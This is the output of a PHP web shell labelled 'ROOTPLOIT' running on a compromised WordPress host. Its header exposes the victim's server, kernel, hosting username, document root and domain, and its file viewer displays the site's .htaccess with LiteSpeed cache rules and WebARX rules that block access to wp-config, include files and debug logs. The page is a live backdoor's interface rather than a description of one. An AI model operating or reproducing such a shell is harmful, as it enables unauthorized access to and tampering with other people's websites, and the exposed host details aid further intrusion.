ROOTPLOIT
Server: LiteSpeed
System: Linux in-mum-web1878.main-hosting.eu 5.14.0-570.21.1.el9_6.x86_64 #1 SMP PREEMPT_DYNAMIC Wed Jun 11 07:22:35 EDT 2025 x86_64
User: u435929562 (435929562)
PHP: 7.4.33
Disabled: system, exec, shell_exec, passthru, mysql_list_dbs, ini_alter, dl, symlink, link, chgrp, leak, popen, apache_child_terminate, virtual, mb_send_mail
$ pwd: /home/u435929562/domains/tec-edu.in/public_html/
Upload Files
File: /home/u435929562/domains/tec-edu.in/public_html/.htaccess
# BEGIN LSCACHE
## LITESPEED WP CACHE PLUGIN - Do not edit the contents of this block! ##
<IfModule LiteSpeed>
RewriteEngine on
CacheLookup on
RewriteRule .* - [E=Cache-Control:no-autoflush]
RewriteRule litespeed/debug/.*\.log$ - [F,L]
RewriteRule \.litespeed_conf\.dat - [F,L]

### marker ASYNC start ###
RewriteCond %{REQUEST_URI} /wp-admin/admin-ajax\.php
RewriteCond %{QUERY_STRING} action=async_litespeed
RewriteRule .* - [E=noabort:1]
### marker ASYNC end ###

### marker DROPQS start ###
CacheKeyModify -qs:fbclid
CacheKeyModify -qs:gclid
CacheKeyModify -qs:utm*
CacheKeyModify -qs:_ga
### marker DROPQS end ###

</IfModule>
## LITESPEED WP CACHE PLUGIN - Do not edit the contents of this block! ##
# END LSCACHE
# BEGIN NON_LSCACHE
## LITESPEED WP CACHE PLUGIN - Do not edit the contents of this block! ##
## LITESPEED WP CACHE PLUGIN - Do not edit the contents of this block! ##
# END NON_LSCACHE
# BEGIN WebARX

#BASIC ID=1
RedirectMatch 409 .(htaccess|htpasswd|errordocs|logs)$
ServerSignature Off
<IfModule mod_rewrite.c>
  RewriteEngine On
  RewriteCond %{HTTP_COOKIE} !^.*wordpress_logged_in.*$ [NC]
  RewriteRule ^readme*.*html$ index.php?webarx_fpage=101 [L,QSA]
  RewriteRule ^license*.*txt$ index.php?webarx_fpage=102 [L,QSA]
  RewriteRule ^wp-config*.*php$ index.php?webarx_fpage=103 [L,QSA]
</IfModule>

#BASIC

#BLOCK WP FILE ACCESS  ID=2

# Block the include-only files.
<IfModule mod_rewrite.c>
  RewriteEngine On
  RewriteCond %{HTTP_COOKIE} !^.*wordpress_logged_in.*$ [NC]
  RewriteRule ^wp-admin/includes/ index.php?webarx_fpage=201 [NC,L]
  RewriteRule ^wp-includes/[^/]+.php$ index.php?webarx_fpage=202 [NC,L]
  RewriteRule ^wp-content/uploads/(.*).php$ index.php?webarx_fpage=202 [NC,L]
  RewriteRule ^wp-includes/js/tinymce/langs/.+.php index.php?webarx_fpage=203 [NC,L]
  RewriteRule ^wp-includes/theme-compat/ index.php?webarx_fpage=204 [NC,L]
</IfModule>

#BLOCK WP FILE ACCESS

#BLOCK DEBUG LOG ACCESS
<IfModule mod_rewrite.c>
  RewriteEngine On
  RewriteRule ^debug*.*log$ index.php?webarx_fpage=502 [L,QSA]
</IfModule>

#BLOCK DEBUG LOG ACCESS

#DISABLE INDEX VIEWS
Options -Indexes

#DISABLE INDEX VIEWS

#FORBID PROXY COMMENT POSTING ID=7
<IfModule mod_rewrite.c>
  RewriteEngine On
  RewriteCond %{HTTP_COOKIE} !^.*wordpress_logged_in.*$ [NC]
  RewriteCond %{REQUEST_METHOD} ^POST
  RewriteCond %{HTTP:VIA} !^$ [OR]
  RewriteCond %{HTTP:FORWARDED} !^$ [OR]
  RewriteCond %{HTTP:USERAGENT_VIA} !^$ [OR]
  RewriteCond %{HTTP:X_FORWARDED_FOR} !^$ [OR]
  RewriteCond %{HTTP:X_FORWARDED_HOST} !^$ [OR]
  RewriteCond %{HTTP:PROXY_CONNECTION} !^$ [OR]
  RewriteCond %{HTTP:XPROXY_CONNECTION} !^$ [OR]
  RewriteCond %{HTTP:HTTP_PC_REMOTE_ADDR} !^$ [OR]
  RewriteCond %{HTTP:HTTP_CLIENT_IP} !^$
  RewriteRule wp-comments-post\.php index.php?webarx_fpage=7 [NC]
</IfModule>

#FORBID PROXY COMMENT POSTING

#WPSCAN ID=19
<IfModule mod_rewrite.c>
  RewriteEngine on
  RewriteCond %{REMOTE_ADDR} !=18.221.197.243
  RewriteRule ^(.*)/plugins/(.*)readme\.(txt|html)$ index.php?webarx_fpage=19 [NC,L] 
</IfModule>

#WPSCAN

# END WebARX
@ Telegram